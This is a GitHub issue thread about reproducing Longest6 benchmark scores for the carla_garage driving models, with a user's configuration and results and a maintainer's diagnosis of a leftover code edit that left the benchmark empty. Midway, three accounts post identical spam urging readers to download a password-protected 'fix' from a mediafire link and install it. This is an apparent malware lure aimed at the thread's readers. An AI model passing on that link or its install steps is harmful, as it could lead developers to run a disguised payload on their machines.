autonomousvision/carla_garage #46: Question about result reproduction on the Longest6 benchmark

novothsz, 2024-08-27:
Hi!
Thank you for your great work!
I have read many issues on this topic, but something is still missing for me.
I am trying to reproduce the result for either:
- waypoint model (?): table 6 (DS: 69 ± 0, RC: 94 ± 2, IS: 0.72 ± 0.01)
- target point model (?): table 13 (DS: 69 ± 1, RC: 97 ± 1, IS: N/A)
- waypoint model (?): table 13 (DS: 70 ± 4, RC: 94 ± 2, IS: N/A)

My questions:
- why results for the waypoint model differ in table 6 and table 13?
- what settings do I need to correct to get the above results on the longest6 benchmark?

Thank you in advance for your answer!

I am using the below environmental variables.

```
export CARLA_ROOT=./carla_garage
export WORK_DIR=./carla_garage
export PYTHONPATH=$PYTHONPATH:${CARLA_ROOT}/PythonAPI
export PYTHONPATH=$PYTHONPATH:${CARLA_ROOT}/PythonAPI/carla
export PYTHONPATH=$PYTHONPATH:$CARLA_ROOT/PythonAPI/carla/dist/carla-0.9.10-py3.7-linux-x86_64.egg
export SCENARIO_RUNNER_ROOT=${WORK_DIR}/scenario_runner
export LEADERBOARD_ROOT=${WORK_DIR}/leaderboard
export PYTHONPATH="${CARLA_ROOT}/PythonAPI/carla/":"${SCENARIO_RUNNER_ROOT}":"${LEADERBOARD_ROOT}":${PYTHONPATH}
export SAVE_PATH=./carla_garage/log_folder
export BENCHMARK=longest6 # Set to longest6 for longest6 results.

export SCENARIOS=${WORK_DIR}/leaderboard/data/scenarios/eval_scenarios.json
export ROUTES=${WORK_DIR}/leaderboard/data/longest6.xml
export REPETITIONS=1 # Set to 3, because paper evaluates 3 times.

export CHECKPOINT_ENDPOINT=./carla_garage/log_folder/result.json
export TEAM_AGENT=${WORK_DIR}/team_code/sensor_agent.py
export TEAM_CONFIG=${WORK_DIR}/pretrained_models/leaderboard/tfpp_wp_all_0
export DEBUG_CHALLENGE=0 # If you want to do visualization.
export RESUME=1 # If you want to resume the evaluation.
export DATAGEN=0 # Set to 1 if you want to do data generation.
export UNCERTAINTY_THRESHOLD=0.33 # For longest6.
export DIRECT=0 # WP model (only wp longest 6 models are provided?): DIRECT=0, Path + target speed: DIRECT=1. "For the leaderboard model set to 0." With setting to 1 the eval does not work.
export STOP_CONTROL=0 # 0 for longest6 
```

The command I am using for the evaluation is:

```
python3 ${LEADERBOARD_ROOT}/leaderboard/leaderboard_evaluator_local.py \
--scenarios=${SCENARIOS} \
--routes=${ROUTES} \
--repetitions=${REPETITIONS} \
--checkpoint=${CHECKPOINT_ENDPOINT} \
--agent=${TEAM_AGENT} \
--agent-config=${TEAM_CONFIG} \
--debug=0 \
--resume=${RESUME} 
```

For parsing I do:
`python ./tools/result_parser.py --xml ./carla_garage/leaderboard/data/longest6.xml --results ./carla_garage/log_folder --log_dir ./carla_garage/log_folder`

With the above settings I get (for a single evaluation):

Avg. driving score	93.473
Avg. route completion	98.247
Avg. infraction penalty	0.952
Collisions with pedestrians	0.018273513802291544
Collisions with vehicles	0.0
Collisions with layout	0.0
Red lights infractions	0.07309405520916618
Stop sign infractions	0.018273513802291544
Off-road infractions	0.031064973463895626
Route deviations	0.0
Route timeouts	0.0
Agent blocked	0.018273513802291544
Avg. speed km/h	12.77454269349177

If I use the
`export TEAM_CONFIG=${WORK_DIR}/pretrained_models/longest6/tfpp_all_0`
and set 
`export DIRECT=1` (because I am using the TP model)
I get:

Avg. driving score	93.243
Avg. route completion	98.243
Avg. infraction penalty	0.9499999999999998
Collisions with pedestrians	0.0
Collisions with vehicles	0.0
Collisions with layout	0.0
Red lights infractions	0.1096450476378612
Stop sign infractions	0.0730966984252408
Off-road infractions	0.0
Route deviations	0.0
Route timeouts	0.0
Agent blocked	0.0182741746063102
Avg. speed km/h	9.926049098902125

FoioMikael, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

praveenking945, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

MirsonMboa, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

Kait0, 2024-08-27:
>     waypoint model (?): table 6 (DS: 69 ± 0, RC: 94 ± 2, IS: 0.72 ± 0.01)
>     target point model (?): table 13 (DS: 69 ± 1, RC: 97 ± 1, IS: N/A)
>     waypoint model (?): table 13 (DS: 70 ± 4, RC: 94 ± 2, IS: N/A)

I am not sure what you mean by target point model. All models are using the target point, except the NC models in Table 1. The models in table 13 differ in the output representation. **TF++** uses Path + Weighted Target Speed Classes (DIRECT=1), whereas **TF++ WP** uses waypoints Waypoints (DIRECT=0).
Table  6 only reports results for TF++.

> why results for the waypoint model differ in table 6 and table 13?

TF++ has 69 DS in both tables. The auxiliary metrics differ slightly because table 13 is a full rerun of the experiments (the difference comes from statistical variance).
The TF++ (69 DS) models weights are released in the `pretrained_models/longest6/tfpp_all_0/` folders (the last number indicating different training repetitions.
The TF++ WP (70 DS) models weights are released in the `pretrained_models/leaderboard/tfpp_wp_all_0/` folders.
Note that the leaderboard models are also evaluated on longest6 and vice versa.

There is some bug in your evaluation.
In your run you get `Collisions with vehicles 0.0` which I think should be impossible in longest6.
CARLA benchmarks have a lot of statistical variance (which is why the paper always reports an average of 9 evaluations, 3 models each evaluated 3 times) but your number are way outside that range.

Your setup looks correct to me, seems to be a more intricate bug, you need to debug.
My guess would that for some reason CARLA doesn't spawn the other vehicles. 
This could happen if you set the benchmark to [empty](https://github.com/autonomousvision/carla_garage/blob/1448bed63642bfe7c25e49e79e15713b20d104e6/leaderboard/leaderboard/scenarios/route_scenario_local.py#L452) (but it seems to be set to longest6).

When you visualize the evaluation, do you see other vehicles?
(either CARLA spectator or set DEBUG_CHALLENGE=1 and log at the generated images)

novothsz, 2024-08-27:
Thank you for your answer Kait0!
Your explanatation makes sense, I was just confused with some of the terminology.
Also, your intuition was perfectly on point, you made me realise, that I had to modify the source code for some reason but never returned it to the original state. Fixing it should fix all my problems (basically, I set the benchmark to empty, regardless of the environment variable).

closed 2024-08-27 by novothsz